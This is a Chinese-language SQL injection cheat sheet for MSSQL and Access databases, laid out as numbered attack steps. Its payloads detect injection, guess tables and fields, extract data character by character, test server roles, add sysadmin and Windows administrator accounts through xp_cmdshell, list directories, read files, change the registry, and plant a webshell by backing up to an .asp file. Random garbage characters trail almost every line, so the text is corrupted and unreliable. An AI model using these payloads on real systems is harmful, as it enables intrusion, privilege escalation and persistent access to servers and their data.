1.判断是否有注入;and 1=1 ;and 1=2 2Z��Ky7p0/
2.初步判断是否是mssql ;and user>0 y2Vc[�o(NP
._<g�c�;G�
3.注入参数是字符'and [查询条件] and ''=' 0$��|wj^?U
��Gu�Q�#��
4.搜索时没过滤参数的'and [查询条件] and '%25'=' Mm%b8�#Fe!
;V^�I>-fnm
5.判断数据库系统 �F8�B:P�7I
��EHm��:&w
;and (select count(*) from sysobjects)>0 mssql ���r6����L
Y�y�_mX}\x
;and (select count(*) from msysobjects)>0 access !={�QL���:
E�I@e���p~
~HXZ�-�*�
)T@+"Pw8t�
6.猜数据库 ;and (select Count(*) from [数据库名])>0 `7�'=~BP?X
%Gm4,+8P3o
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 2Oy����-jM
@�@|H8mP}H
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 �=GLMdhD]�
s_�7�6�)7�
9.(1)猜字段的ascii值(access) I2C1�mV
l�6!a?C[2T
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 �r`C t/�]c
XNkQ�0�o0
(2)猜字段的ascii值(mssql) 7`� t��, �
? \NT'C�G
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 E9j(%kQ�2�
j�{P3o<l&`
10.测试权限结构(mssql) 0�vM,2:kf*
;+Mr|vweTC
!}HT�&N8[r
b�fA�9��aT
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- 2�^&5D,}�0
��Z�h_�P��
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- �< !]�7G�t
A�I�2�>{V�
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- VM��"�*@T�
�7s1LK/R|u
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- rE�\�.[mFI
� ��34~[dY
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- c�S"P�IelR
{1�W���,-%
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- %$F\�o1�S
�sUsIu,1Q�
;and 1=(select IS_MEMBER('db_owner'));-- V�_�pKe�~
5@~5RNrq2�
�dH0wVI�<z
RTT�E�Ah:.
11.添加mssql和系统的帐户 'w}/�o�+x@
z�nd� fIt^
;exec master.dbo.sp_addlogin username;-- �@fSqGsSk�
;exec master.dbo.sp_password null,username,password;-- �,�YmT���x
�)X-TJ�+�d
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- mOx>p"n�
~�
�*P9_�<
;exec master.dbo.xp_cmdshell 'net user username password U6oab�9C?k
}ABH�Gr�5[
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- �x�iQ;lE
�
tNCKL.�y�U
;exec master.dbo.xp_cmdshell 'net user username password /add';-- i- r �y5�x
x��<{)xP+|
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- `d:cq�.OO�
B�mFs6{>~c
n\H�.NL)�
�6-u�B[$ko
12.(1)遍历目录 D�i #E��m[
o�<%s�\n��
;create table dirs(paths varchar(100), id int) uJ/�&!�q<3
lF!Iu.MM 9
;insert dirs exec master.dbo.xp_dirtree 'c:\' W�hR�'MkfL
ca8.8uHY\�
;and (select top 1 paths from dirs)>0 �6w^Fee`>]
�W�>`#��`u
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) x)�o`w"]al
,�]-A�~�^|
�{siIRl2&�
C@s�;0-qL
(2)遍历目录 d�<4q%y'X{
n�D;8)VI'I
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- �f�Hwr6"DJ
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 ��\�}mn"y�
#��m�e'1/z
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 p*(�]8pD�C
�V� .VV:`S
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 Fs)���m;C�
.=4k�'�99,
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 v"G)��G)*z
1]Gp��\P}�
UI�.>BZ6}�
uSK<{UT~�3
13.mssql中的存储过程 $WK~|+"�{>
~gv�w6e*[�
xp_regenumvalues 注册表根键, 子键 {F+i�L&e)
n:[��G��K_
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 rui]_F�n]I
-dsE9)&8DX
xp_regread 根键,子键,键值名 ]�AzDk�K�j
�uPtS.�j�=
;exec xp_regread "+�:IA|1wD
�Se-�n#��
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 \�)n'��Ywr
>0qe*�4n|M
xp_regwrite 根键,子键, 值名, 值类型, 值 iu�6�NIy7D
$N)b6(}F10
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 O*�7`�Waag
Vy[� m%sEP
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 -|~��tZuf�
,BG
L|5?3z
xp_regdeletevalue 根键,子键,值名 9N]�V ��F'
2�DTBL:?`
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 ,�,���[�pc
���Yn }Ivg
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 " tUF,G�(<
IF$*6
,v.z
�&%�4*~�;o
*�(sFr�� E
14.mssql的backup创建webshell �w*"h#^1z�
�1 ��ojy�_
use model �T.p:`}Ma
<r�p�X�hcR
create table cmd(str image); \z�Pcn��DB
/{d��5$(Y"
insert into cmd(str) values (''); ==p�GRau�q
1#�<KZN =$
backup database model to disk='c:\l.asp'; VaRP+J}UA.
�N/�&t)��7
��41V}6+$g
�+Qe&#�"O0
15.mssql内置函数 ��h��^�$�c
VD�P \E<3"
;and (select @@version)>0 获得Windows的版本号 ��2{o
�e�J
0*Is#73rjY
;and user_name()='dbo' 判断当前系统的连接用户是不是sa �jVtRn.qh
�m'��i�^BE
;and (select user_name())>0 爆当前系统的连接用户 R59'�KR2?�
52�JtEt7E�
;and (select db_name())>0 得到当前连接的数据库 �#ig�* !�
<��^(g<B`>
&�.}Z�j*BD
Cs��N�D:�m
16.简洁的webshell Tp?�l;��DU
EFb���"{�L
use model (G��3S+T 9
u9}k^W�)E�
create table cmd(str image); 'P^�6H��$0
�<>�Fp�vdB
insert into cmd(str) values (''); ;,yjkD[mWE
���_ X*
A
backup database model to disk='g:\wwwtest\l.asp';
